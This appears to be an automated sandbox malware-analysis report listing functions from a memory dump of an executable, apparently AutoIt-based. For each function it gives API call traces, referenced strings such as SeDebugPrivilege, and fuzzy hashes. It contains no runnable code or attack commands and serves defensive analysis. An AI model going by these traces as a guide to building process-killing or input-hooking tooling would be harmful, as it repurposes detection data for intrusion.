Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 069f9c37da191a64f0e930dc1eed1425c7c11ce92349c9a12503248ed7508e9a
Instruction ID: 825d3ea66e85926f69184bc0f399c88e6dacdd736eb6e740d0c0a97cb991a4d8
Opcode Fuzzy Hash: 069f9c37da191a64f0e930dc1eed1425c7c11ce92349c9a12503248ed7508e9a
Instruction Fuzzy Hash: F921C5B4900208BBDF05AB64CCC5EFEBB79EF58300F14401AF961972A1DB759959DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00199645, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00199651
GetClassNameW.USER32 ref: 00199666
_wcscmp.LIBCMT ref: 00199678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001996F3

Strings

SHELLDLL_DefView, xrefs: 00199672
smallicons, xrefs: 001996BB
details, xrefs: 001996A1
largeicons, xrefs: 00199687
list, xrefs: 001996D5

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ba214fc26fbedd1b4039a36fab214521abe8d09be75acd1875aec81b54de4b0c
Instruction ID: ea8decaa9d2cc856f995b03e13c2cb4e3b2b5837f2fdd8fd86b8b51f43e37600
Opcode Fuzzy Hash: ba214fc26fbedd1b4039a36fab214521abe8d09be75acd1875aec81b54de4b0c
Instruction Fuzzy Hash: BB11E976248317BAFE053628DC07EB6779C9F15760F20012FFA10A54E1FFA1A9618A58

Uniqueness

Uniqueness Score: -1.00%

Function 001B8BC0, Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001B8BEC
CoInitialize.OLE32(00000000), ref: 001B8C19
CoUninitialize.OLE32 ref: 001B8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 001B8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 001B8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,001D2C0C), ref: 001B8E84
CoGetObject.OLE32(?,00000000,001D2C0C,?), ref: 001B8EA7
SetErrorMode.KERNEL32(00000000), ref: 001B8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001B8F3A
VariantClear.OLEAUT32(?), ref: 001B8F4A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: ea2fa0424c54a3c954b34514f4dbafeab0453d7862658c8ee17aada89c38f4e5
Instruction ID: 40884a27f1f341f2765f7dab7167db6075527fbe9fcbff0756ec475c8622f996
Opcode Fuzzy Hash: ea2fa0424c54a3c954b34514f4dbafeab0453d7862658c8ee17aada89c38f4e5
Instruction Fuzzy Hash: BBC125B1608305AFC700EF64C8849ABBBE9FF89748F00495DF5899B261DB71ED46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001A4189, Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 001A419D
__swprintf.LIBCMT ref: 001A41AA

Part of subcall function 001638D8: __woutput_l.LIBCMT ref: 00163931

FindResourceW.KERNEL32(?,?,0000000E), ref: 001A41D4
LoadResource.KERNEL32(?,00000000), ref: 001A41E0
LockResource.KERNEL32(00000000), ref: 001A41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 001A420D
LoadResource.KERNEL32(?,00000000), ref: 001A421F
SizeofResource.KERNEL32(?,00000000), ref: 001A422E
LockResource.KERNEL32(?), ref: 001A423A
CreateIconFromResourceEx.USER32 ref: 001A429B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: b6a4259fa26035d4ebff4d3582aaf702d3b2b48b49b0bde7c6e7251779096ed8
Instruction ID: 9b59a6d6fff04ce01f2d1ac46dda243baa3beff2e8129b6a9de57544bc6b7991
Opcode Fuzzy Hash: b6a4259fa26035d4ebff4d3582aaf702d3b2b48b49b0bde7c6e7251779096ed8
Instruction Fuzzy Hash: C931A175A0521AAFDB119F60EC48EBF7BADEF45301F00452AF915D2150D7B0DA62CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A16DE, Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001A1700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,001A0778,?,00000001), ref: 001A1714
GetWindowThreadProcessId.USER32(00000000), ref: 001A171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001A0778,?,00000001), ref: 001A172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 001A173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001A0778,?,00000001), ref: 001A1755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001A0778,?,00000001), ref: 001A1767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001A0778,?,00000001), ref: 001A17AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001A0778,?,00000001), ref: 001A17C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001A0778,?,00000001), ref: 001A17CC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 09a4c462d964760e20d9a521a5b278249e7739b78f9ce109b7726c81257c9818
Instruction ID: 1b777f4757bba50530b51b3d76d29648d3c6f2468cda778c19b0923f47cbc447
Opcode Fuzzy Hash: 09a4c462d964760e20d9a521a5b278249e7739b78f9ce109b7726c81257c9818
Instruction Fuzzy Hash: 2931A279A04305BFEB119F94EC8CF797BEAEB66751F104029F904C66A0D774AD808BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B4458, Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 001B447F
EmptyClipboard.USER32 ref: 001B4485
GlobalAlloc.KERNEL32(00000002,?), ref: 001B449A
CloseClipboard.USER32 ref: 001B4539

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 13957485392f2c99c43716656219ed00761ba125f60cfa471c6d5f2486730993
Instruction ID: fc5149c2a1c20a9cb5227dd4af81f15d92e51d222e3e31d51de18442eaa7fbf0
Opcode Fuzzy Hash: 13957485392f2c99c43716656219ed00761ba125f60cfa471c6d5f2486730993
Instruction Fuzzy Hash: A8219C352006209FDB10AF24EC49FAE7BA9EF14711F10806AF946DB2B2CB30EC41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0019A693, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 0019A9A2

Strings

CLASS, xrefs: 0019A721
NAME, xrefs: 0019A7D4
CLASSNN, xrefs: 0019A744
REGEXPCLASS, xrefs: 0019A767
TEXT, xrefs: 0019A8D9
INSTANCE, xrefs: 0019A8B0

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: f023d9c1d6265b6663d014a6fccf30dbac7566f24533dfbef38f119d9d25d1f5
Instruction ID: c1a40dba53fe6e6403c38ca0441bc27c23e12ecc9b9d490ad71619cbde0b7aae
Opcode Fuzzy Hash: f023d9c1d6265b6663d014a6fccf30dbac7566f24533dfbef38f119d9d25d1f5
Instruction Fuzzy Hash: B8917270A0060AEBDF18EFA0C881BE9FB75BF14314F918119E99AA7151DF306A5DCBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00142E26, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00142EAE

Part of subcall function 00141DB3: GetClientRect.USER32 ref: 00141DDC
Part of subcall function 00141DB3: GetWindowRect.USER32 ref: 00141E1D
Part of subcall function 00141DB3: ScreenToClient.USER32 ref: 00141E45

GetDC.USER32 ref: 0017CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0017CF95
SelectObject.GDI32(00000000,00000000), ref: 0017CFA3
SelectObject.GDI32(00000000,00000000), ref: 0017CFB8
ReleaseDC.USER32 ref: 0017CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0017D04B

Strings

U, xrefs: 0017CF20

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c3f809f92f4d6eb98950fb731ecdcced8c6823344baa64f3411c5e52a79ebbaf
Instruction ID: 66f4788ca97d41288f5b6aa94ce1d879c35cc061c4e823b390ae33654054b923
Opcode Fuzzy Hash: c3f809f92f4d6eb98950fb731ecdcced8c6823344baa64f3411c5e52a79ebbaf
Instruction Fuzzy Hash: 7F71A530500209DFCF25CF64DC84AAA7BB6FF49350F14826EFD596A166C7318C92DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001B8F5B, Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,001CF910), ref: 001B903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001CF910), ref: 001B9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001B91EB
SysFreeString.OLEAUT32(?), ref: 001B9215

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 064242b021a5f9868b4f20de43d8de83e341f6c38112ebc7a3df4e3564302d49
Instruction ID: 4eeb8e43b161cc1604fb0adc4347afafcd245afe53b634d2c7590b24a6ca7f1b
Opcode Fuzzy Hash: 064242b021a5f9868b4f20de43d8de83e341f6c38112ebc7a3df4e3564302d49
Instruction Fuzzy Hash: 23F1F971A00119EFDB04DFA4C888EEEB7B9FF49315F108459F515AB261DB31AE46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001A4F63, Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001A48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001A38D3,?), ref: 001A48C7

Part of subcall function 001A48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001A38D3,?), ref: 001A48E0

Part of subcall function 001A4CD3: GetFileAttributesW.KERNEL32(?,001A3947), ref: 001A4CD4

lstrcmpiW.KERNEL32(?,?), ref: 001A4FE2
_wcscmp.LIBCMT ref: 001A4FFC
MoveFileW.KERNEL32(?,?), ref: 001A5017

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: e7894cb90cc63b3b9c18dd627775cbc8933bd9412900f54f954441a9218dc0e5
Instruction ID: e4537f33c856b2e0020815cf761d0a901d5e0701f97c2c7ebbaff5be6f8fe663
Opcode Fuzzy Hash: e7894cb90cc63b3b9c18dd627775cbc8933bd9412900f54f954441a9218dc0e5
Instruction Fuzzy Hash: EB5171B600C7849BC724DBA0CC819DFB3ECAF95340F00492EF189C3152EF74A2888766

Uniqueness

Uniqueness Score: -1.00%

Function 001C88B4, Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001C896E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 5f2399e2ab90cf14d8c9ba98a83a46f7d45beef8e0e63f843fc85b98cfd50dcc
Instruction ID: 6bd9ea7cf577b4f426ece688d4d665c46835a7fe908222bec58832a9f3807733
Opcode Fuzzy Hash: 5f2399e2ab90cf14d8c9ba98a83a46f7d45beef8e0e63f843fc85b98cfd50dcc
Instruction Fuzzy Hash: 4A51A130600219BEDF249F28CCC9FAA7B65BB25314F60411AF515E79A1DF71ED908B51

Uniqueness

Uniqueness Score: -1.00%

Function 00142B72, Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 0017C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0017C569
LoadImageW.USER32 ref: 0017C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0017C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0017C5C0
DestroyIcon.USER32(00000000), ref: 0017C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0017C5EC
DestroyIcon.USER32(?), ref: 0017C5FB

Part of subcall function 001CA71E: DeleteObject.GDI32(00000000), ref: 001CA757

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: d461113cbf5a654ec9405f319dd10292b7094dc41c296e061a75a6e25eeaaf54
Instruction ID: a7a9dfe036645fadfb96672c544188d7138ad37250e53c53c8c8473eb7438351
Opcode Fuzzy Hash: d461113cbf5a654ec9405f319dd10292b7094dc41c296e061a75a6e25eeaaf54
Instruction Fuzzy Hash: FB515974A00309AFDB24DF24DC85FAA7BB5EB58310F50452CF906976A0DB71ED91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00198E03, Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00198A84,00000B00,?,?), ref: 00198E0C
HeapAlloc.KERNEL32(00000000,?,00198A84,00000B00,?,?), ref: 00198E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00198A84,00000B00,?,?), ref: 00198E28
GetCurrentProcess.KERNEL32(?,00000000,?,00198A84,00000B00,?,?), ref: 00198E30
DuplicateHandle.KERNEL32(00000000,?,00198A84,00000B00,?,?), ref: 00198E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00198A84,00000B00,?,?), ref: 00198E43
GetCurrentProcess.KERNEL32(00198A84,00000000,?,00198A84,00000B00,?,?), ref: 00198E4B
DuplicateHandle.KERNEL32(00000000,?,00198A84,00000B00,?,?), ref: 00198E4E
CreateThread.KERNEL32 ref: 00198E68

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 67d3fbfea285093868ce34630445bb537842491cb17e48fcb17ebe5d83b61ed4
Instruction ID: 3d6e07d9afa8af9edfcc8a5000e8aea27922233834248496ee46cb2478f3ed55
Opcode Fuzzy Hash: 67d3fbfea285093868ce34630445bb537842491cb17e48fcb17ebe5d83b61ed4
Instruction Fuzzy Hash: A001A4B5240308FFEA10ABA5DC49F6B7BADEB89711F044425FA05DB6A1CA70D8418A20

Uniqueness

Uniqueness Score: -1.00%

Function 001B9428, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001B947C
VariantInit.OLEAUT32(?), ref: 001B954D
VariantInit.OLEAUT32(?), ref: 001B964E
VariantClear.OLEAUT32(?), ref: 001B9658
VariantClear.OLEAUT32(?), ref: 001B96B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 001B9631
Null Object assignment in FOR..IN loop, xrefs: 001B94DD, 001B960B, 001B96C3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: f007ba4d49e120204e458c53c3141851ea73596e8f9ed0cc25e4af31b0811ec0
Instruction ID: a1e506fa0baef402845f629fb0adac761ffff70f2fceb706ef7e79b7aca5f4a5
Opcode Fuzzy Hash: f007ba4d49e120204e458c53c3141851ea73596e8f9ed0cc25e4af31b0811ec0
Instruction Fuzzy Hash: 80919171A00219ABDF24DFA5CC44FEEBBB8EF45710F10815AF615AB290D7749946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C6FEF, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001C7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 001C70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001C70C1
_wcscat.LIBCMT ref: 001C711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 001C7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 001C7161

Strings

SysListView32, xrefs: 001C7065

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: ab3bb28ff2806c350d0b484b94529e7919feec0211394660520b544a872e204c
Instruction ID: ff4534fd0fc1c4d67c3f2a24480b9b146e1ae2ff39b7d092422e3dbffe5be688
Opcode Fuzzy Hash: ab3bb28ff2806c350d0b484b94529e7919feec0211394660520b544a872e204c
Instruction Fuzzy Hash: CD418071A04308ABDB219FA4CC85FEE77A9EF18350F10452EF544A72D2D7B1DD958B50

Uniqueness

Uniqueness Score: -1.00%

Function 001BEC47, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 001A3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 001A3EB6
Part of subcall function 001A3E91: Process32FirstW.KERNEL32(00000000,?), ref: 001A3EC4
Part of subcall function 001A3E91: CloseHandle.KERNEL32(00000000), ref: 001A3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 001BECB8
GetLastError.KERNEL32 ref: 001BECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 001BECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 001BED77
GetLastError.KERNEL32(00000000), ref: 001BED82
CloseHandle.KERNEL32(00000000), ref: 001BEDB7

Strings

SeDebugPrivilege, xrefs: 001BECD6

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7ef01f5ffc8ffac78673c6c0f5bdc2180b8980e4dc166ab2cc0790a1acaad3ca
Instruction ID: 81013515fc595777f33542f1960df8e4ac7f7bb0dff3b901a0421a4e81b8f069
Opcode Fuzzy Hash: 7ef01f5ffc8ffac78673c6c0f5bdc2180b8980e4dc166ab2cc0790a1acaad3ca
Instruction Fuzzy Hash: FB41AB71200201AFDB14EF64CC95FAEBBA1AF90714F18845DF8429B2D2DBB5A845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001A3226, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 001A32C5

Strings

warning, xrefs: 001A32AE
stop, xrefs: 001A3296
info, xrefs: 001A3266
question, xrefs: 001A327E
blank, xrefs: 001A3247

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 749cfe8d7ba0161bdc109af480b6e358bec48a68c3076a271a6c66c14bb664d0
Instruction ID: be39be8e279e2b18f5c0d5d694ba3879659ce068016863cb81778ace99e1acca
Opcode Fuzzy Hash: 749cfe8d7ba0161bdc109af480b6e358bec48a68c3076a271a6c66c14bb664d0
Instruction Fuzzy Hash: 2611277920834ABAE7055B54DC43F7AB79CDF1B370F20002BF524A6181E7656B4145B5

Uniqueness

Uniqueness Score: -1.00%

Function 001A4534, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001A454E
LoadStringW.USER32(00000000), ref: 001A4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001A456B
LoadStringW.USER32(00000000), ref: 001A4572
_wprintf.LIBCMT ref: 001A4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 001A45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 001A4593

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
